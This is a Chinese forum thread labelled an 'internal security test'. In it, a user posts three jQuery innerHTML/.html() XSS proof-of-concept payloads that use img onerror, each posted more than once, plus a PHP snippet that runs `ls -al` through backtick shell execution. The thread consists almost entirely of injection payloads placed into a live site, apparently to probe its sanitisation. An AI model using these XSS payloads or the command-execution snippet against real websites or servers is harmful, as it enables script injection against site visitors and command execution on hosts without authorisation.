Joselai-内部安全测试

显示全部楼层 · 永洪tech-jose 2023-04-25 16:20:47 发布在论坛

本帖最后由永洪tech-jose 于 2023-4-26 10:35 编辑

这个是用于内部安全测试，管理员可以忽略

PoC 1Assign to innerHTML Append via .html()
<style><style /><img src=x onerror=alert(1)>

<style><style /><img src=x onerror=alert(1)>

复制代码

PoC 2 (Only jQuery 3.x affected)Assign to innerHTML Append via .html()
<img alt="<x" title="/><img src=x onerror=alert(1)>">

<img alt="<x" title="/><img src=x onerror=alert(1)>">

复制代码

PoC 3Assign to innerHTML Append via .html()
<option><style></option></select><img src=x onerror=alert(1)></style>

<option><style></option></select><img src=x onerror=alert(1)></style>

复制代码

显示全部楼层

<?php
$output = `ls -al`;
echo "<pre>$output</pre>";
?>

显示全部楼层

<style><style /><img src=x onerror=alert(1)>
<img alt="<x" title="/><img src=x onerror=alert(1)>">
<option><style></option></select><img src=x onerror=alert(1)></style>

显示全部楼层

[报错信息处理] Joselai-内部安全测试

【报错信息处理】 Joselai-内部安全测试

精彩评论3

热门产品

社区资源

关于永洪